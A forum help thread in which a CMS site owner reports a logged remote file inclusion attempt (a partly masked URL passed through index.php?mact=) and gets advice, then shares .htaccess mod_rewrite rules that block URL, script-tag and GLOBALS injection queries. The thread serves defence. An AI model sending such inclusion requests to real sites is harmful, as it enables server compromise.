Is this something too worry about?

[Signex]

I was just looking in some logs and I see some useragent is trying to add strange url`s, does anyone know if this is a risk ?


Host: ********** (changed)

/index.php?mact=http:****//0xg3458.hub.io/pb****.php? (the **** are put in by myself to make it a wrong link)

Http Code: 200 Date: Sep 19 23:09:06 Http Version: HTTP/1.1 Size in Bytes: 10786

Referer: -

Agent: Wget/1.1 (compatible; i486; Linux; RedHat7.3)

[calguy1000]

Yeah, it's something to worry about.

[Signex]

and whats the best thing to do about it?

[calguy1000]

Analyze the url, see if they're fishing, or if there's a potential vulnerability in the code that they're trying to exploit, then potentially fool with your firewall rules to block that account

and/or fool with mod security to reject those queries.... use caution here though, as you could block some valid behaviour.

[Signex]

Ok thanks,

Well the url http:****//0xg3458.hub.io/pb****.php?  now gives this message ;

The web page you are trying to access has been removed by our server administrator.
We do not allow porn pages (anything with complete nudity) or any illegal pages!

Before that it looked like a compressed php script, so i guess they already deleted it at 2ip.com which owns hub**.io

When i tried to do the same thing it basicly gave me a 404 and redirect me to my homepage becuase a .htaccess rule which redirects all 404 error to the homepage.

It was tried 2 times from different IP`s, cant find any new tries though

[Signex]

The only thing that uses "index.php?mact" is the news module.

he or she just tried:  http://www.domain.ltd/index.php?mact=ht ... pb****.php?

Well as far as my knowledge goes, I cant find anything that could be harmed with that.

[alby]

The only thing that uses "index.php?mact" is the news module.

No, it's a normal call for modules
Maybe a try for a possible include (and URL fopen wrappers enabled)
I have not check in source if mact does include but I don't think

Alby

[Pierre M.]

...and/or fool with mod security to reject those queries.... use caution here though, as you could block some valid behaviour.

+1. Beware such queries. Don't let them reach PHP. Block them before at the webserver level. Here are some hints with mod_rewrite.

Pierre M.

[Signex]

The only thing that uses "index.php?mact" is the news module.

No, it's a normal call for modules
Maybe a try for a possible include (and URL fopen wrappers enabled)
I have not check in source if mact does include but I don't think

Alby

URL f_open is disabled in the php.ini.

[Signex]

...and/or fool with mod security to reject those queries.... use caution here though, as you could block some valid behaviour.

+1. Beware such queries. Don't let them reach PHP. Block them before at the webserver level. Here are some hints with mod_rewrite.

Pierre M.

Thanks for the link, i`ll look into that, I have been slacking to enable pretty url`s fot this site, so i`ll first look at making the website use mod_rewrite pretty url and blocking potential risky requests.

[Signex]

Well if looked at blocking these attacks with .htaccess

And it works very well, added a few extry lines, besides the ones Pierre pointed out, for blocking  ""  and for scripts trying to set Register globals and another rule for scripts trying to modify a _REQUEST varaible via URL.

I tried to add some urls and such myself and all get blocked

Thank you all !

[Pierre M.]

Notice : you don't need to activate pretty URLs to filter then with mod_rewrite or mod_security. Pretty URLs rules come after filtering rules.
BTW, if you have found valuable (I mean : not specific to your site) filter rules you can share them here.
Have fun with CMSms

Pierre M.

[Signex]

Notice : you don't need to activate pretty URLs to filter then with mod_rewrite or mod_security. Pretty URLs rules come after filtering rules.
BTW, if you have found valuable (I mean : not specific to your site) filter rules you can share them here.
Have fun with CMSms

Pierre M.

I understand pretty urls with mod_rewrite arent neccesary for the filtering but I have a couple sites using mod_rewrite pretty urls and a couple that dont (or at least not yet)

On the sites where I dont use mod_rewrite for pretty urls the filtering works fine with this code:

Code: Select all

RewriteEngine on

#IF the URI contains a "http:"
RewriteCond %{QUERY_STRING} http\: [OR]

#: alone could make problems in the admin area or if you have installed dokuwiki for example in a subfolder

#OR if the URI contains a "["
RewriteCond %{QUERY_STRING} \[ [OR]

#OR if the URI contains a "]"
RewriteCond %{QUERY_STRING} \] [OR]

#OR if the URI contains a "<__script__>"
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]

#OR script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]

#OR any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [OR]

#OR if the URI contains a "/"
RewriteCond %{QUERY_STRING} \/

#add as much filters as your want...

#THEN whatever the request, don't process it, send a 403.
RewriteRule ^.*$ - [F,L]

But as soon as I put the above code in a .htaccess which also uses mod_rewrite pretty urls, the filtering stops working

even if I strip out this part

Code: Select all

[OR]

#OR if the URI contains a "/"
RewriteCond %{QUERY_STRING} \/

So basicly i`m struggling to get it to work both the pretty urls and the filtering.

In case you want to see my mod_rewrite pretty url code, i`m using this:

Code: Select all

Options +FollowSymLinks
RewriteEngine on
RewriteBase /

# 301 Redirect all requests that don't contain a dot or trailing slash to
# include a trailing slash
RewriteCond %{REQUEST_URI} !/$
RewriteCond %{REQUEST_URI} !\.
RewriteRule ^(.*) %{REQUEST_URI}/ [R=301,L]

# Rewrites urls in the form of /parent/child/
# but only rewrites if the requested URL is not a file or directory
RewriteCond %{REQUEST_FILENAME} !-f [NC]
RewriteCond %{REQUEST_FILENAME} !-d [NC]
RewriteRule ^(.+)$ index.php?page=$1 [QSA]

Do you have any idea how to get them to work both

[Pierre M.]

In the case of /parent/child obviously /some/path/to/page.html contains "/". So "/" alone shouldn't be considered evil and let pretty URLs work as usual. But double "/" may be suspect ? your taste...

Pierre M.

edit :

BTW, this makes another reason to postfix w3 content URL by "html" like /parent/page.html because it is easy to reject requests not postfixed with "html" :

Code: Select all

RewriteCond %{REQUEST_URI} !\.html$
RewriteRule ^.*$ - [F,L]

Caution, use after tuning only, this raw rule prevents CSS, modules, scripts... to work.

[Signex]

Thanks Pierre M,

I still cant get it to work both (mod_rewrite urls and filtering)

If I use this code, pretty urls work but the filtering gives 404 errors instead of 403 like it should give.

Can you find any errors in this code?;

Code: Select all

Options +FollowSymLinks
RewriteEngine on
RewriteBase /

#IF the URI contains a "http:"
RewriteCond %{REQUEST_URI} http\: [OR]

#OR if the URI contains a "["
RewriteCond %{REQUEST_URI} \[ [OR]

#OR if the URI contains a "]"
RewriteCond %{REQUEST_URI} \] [OR]

#OR if the URI contains a "<__script__>"
RewriteCond %{REQUEST_URI} (\<|%3C).*script.*(\>|%3E) [NC,OR]

#OR script trying to set a PHP GLOBALS variable via URL
RewriteCond %{REQUEST_URI} GLOBALS(=|\[|\%[0-9A-Z]{0,2})

RewriteRule ^.*$ - [F,L] 

# 301 Redirect all requests that don't contain a dot or trailing slash to
# include a trailing slash
RewriteCond %{REQUEST_URI} !/$
RewriteCond %{REQUEST_URI} !\.
RewriteRule ^(.*) %{REQUEST_URI}/ [R=301,L]

# Rewrites urls in the form of /parent/child/
# but only rewrites if the requested URL is not a file or directory
RewriteCond %{REQUEST_FILENAME} !-f [NC]
RewriteCond %{REQUEST_FILENAME} !-d [NC]
RewriteRule ^(.+)$ index.php?page=$1 [QSA]